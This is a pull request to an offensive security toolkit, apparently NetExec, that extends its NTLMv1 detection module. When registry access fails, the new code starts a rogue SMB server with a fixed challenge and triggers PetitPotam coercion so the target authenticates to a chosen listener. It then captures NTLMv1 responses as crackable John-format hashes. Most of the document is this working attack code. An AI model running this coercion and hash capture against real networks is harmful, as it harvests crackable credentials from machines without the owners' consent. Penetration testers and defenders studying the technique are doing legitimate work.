### PR TITLE
[Modules] - NTLMv1 - Enhanced ntlmv1 module to perform checks without admin rights

### DIFF
--- a/nxc/modules/ntlmv1.py
+++ b/nxc/modules/ntlmv1.py
@@ -1,13 +1,17 @@
 from impacket.dcerpc.v5 import rrp
 from impacket.examples.secretsdump import RemoteOperations
-from impacket.dcerpc.v5.rrp import DCERPCSessionError
-
+from impacket.dcerpc.v5.rrp import DCERPCSessionError, DCERPCException
+from impacket import smbserver
+from nxc.modules.petitpotam import coerce, efs_rpc_open_file_raw
+from multiprocessing import Process
+import time
 
 class NXCModule:
     """
     Detect if the target's LmCompatibilityLevel will allow NTLMv1 authentication
     Module by @Tw1sm
     Modified by Deft (08/02/2024)
+    Modified by PandHacker (17/04/2024)
     """
 
     name = "ntlmv1"
@@ -19,7 +23,32 @@ class NXCModule:
     def options(self, context, module_options):
         self.output = "NTLMv1 allowed on: {} - LmCompatibilityLevel = {}"
 
-    def on_admin_login(self, context, connection):
+        if not "LISTENER" in module_options:
+            context.log.fail("LISTENER option not specified!")
+            exit(1)
+
+        self.listener = module_options["LISTENER"]
+        self.timeout = 5 if not "TIMEOUT" in module_options else module_options["TIMEOUT"]
+
+    @staticmethod
+    def smbserver_proc(smbServer: smbserver.SimpleSMBServer, context):
+        smbServer.start()
+        message = str(smbServer._SimpleSMBServer__server._SMBSERVER__activeConnections)
+        if message.startswith('VULNERABLE'):
+            context.log.highlight(smbServer._SimpleSMBServer__server._SMBSERVER__activeConnections)
+
+    @staticmethod
+    def connection_handler(smbServer, connData, domain_name, user_name, host_name):
+        if len(connData['AUTHENTICATE_MESSAGE']['ntlm']) <= 24:
+            smbServer._SMBSERVER__activeConnections = 'VULNERABLE: ' + smbserver.outputToJohnFormat(
+                connData['CHALLENGE_MESSAGE']['challenge'], connData['AUTHENTICATE_MESSAGE']['user_name'], 
+                connData['AUTHENTICATE_MESSAGE']['domain_name'],
+                connData['AUTHENTICATE_MESSAGE']['lanman'],
+                connData['AUTHENTICATE_MESSAGE']['ntlm']
+            )['hash_string']
+        smbServer.shutdown()
+
+    def on_login(self, context, connection):
         try:
             remote_ops = RemoteOperations(connection.conn, False)
             remote_ops.enableRegistry()
@@ -49,7 +78,45 @@ class NXCModule:
                 if data in [0, 1, 2]:
                     context.log.highlight(self.output.format(connection.conn.getRemoteHost(), data))
 
-        except DCERPCSessionError as e:
-            context.log.debug(f"Error connecting to RemoteRegistry: {e}")
+        except (DCERPCSessionError, DCERPCException) as e:
+            context.log.highlight(f"Error connecting to RemoteRegistry: {e}")
+
+            server = smbserver.SimpleSMBServer()
+            server.setSMBChallenge('')
+            server.setAuthCallback(self.connection_handler)
+            
+            server_proc = Process(target=self.smbserver_proc, args=(server, context))
+            context.log.highlight(f"Starting SMBServer...")
+            server_proc.start()
+
+            context.log.highlight(f"Triggering authentication with PetitPotam")
+            dce = coerce(
+                connection.username,
+                password=connection.password,
+                domain=connection.domain,
+                lmhash=connection.lmhash,
+                nthash=connection.nthash,
+                aesKey=connection.aesKey,
+                target=connection.host if not connection.kerberos else connection.hostname + "." + connection.domain,
+                pipe="lsarpc",
+                do_kerberos=connection.kerberos,
+                dc_host=connection.kdcHost,
+                target_ip=connection.host,
+                context=context
+            )
+            petitpotam_proc = Process(target=efs_rpc_open_file_raw, args=(dce, self.listener, context))
+            petitpotam_proc.start()
+
+            start = time.time()
+            while time.time() - start < self.timeout:
+                if not server_proc.is_alive():
+                    break
+                time.sleep(.1)
+            else:
+                server_proc.terminate()
+
+            server_proc.join()
+            petitpotam_proc.terminate()
+            petitpotam_proc.join()
         finally:
             remote_ops.finish()


### PR DESCRIPTION
The implementation of ntlmv1 module was only useable when we got admin rights or being able to perform Remote Registry operations, hence, it was not useful when you were trying to exploit/check the vulnerability before compromising the computer.

I refactored the module to perform, first, remote operations and falling back to exploitation when a `DCERPCException` is raised.

The way I implemented it, will setup a SMB Server and trigger an authentication with `efs_rpc_open_file_raw` each in a new process to be able to stop them easily. However, the code is not perfect, especially when the inter-process communication is needed, I just developed it and wanted to share it in case someone has ideas to improve it.

Currently, it is no more possible to run it through multiple target in parallel due to the smbserver started (which cannot be started since tcp/445 is busy).

![image](https://github.com/Pennyw0rth/NetExec/assets/45815627/c6c6a8e1-0f71-489f-8eee-631dd7424b0e)
![image](https://github.com/Pennyw0rth/NetExec/assets/45815627/fe41ca27-a927-4064-90a8-536e08d05cb7)
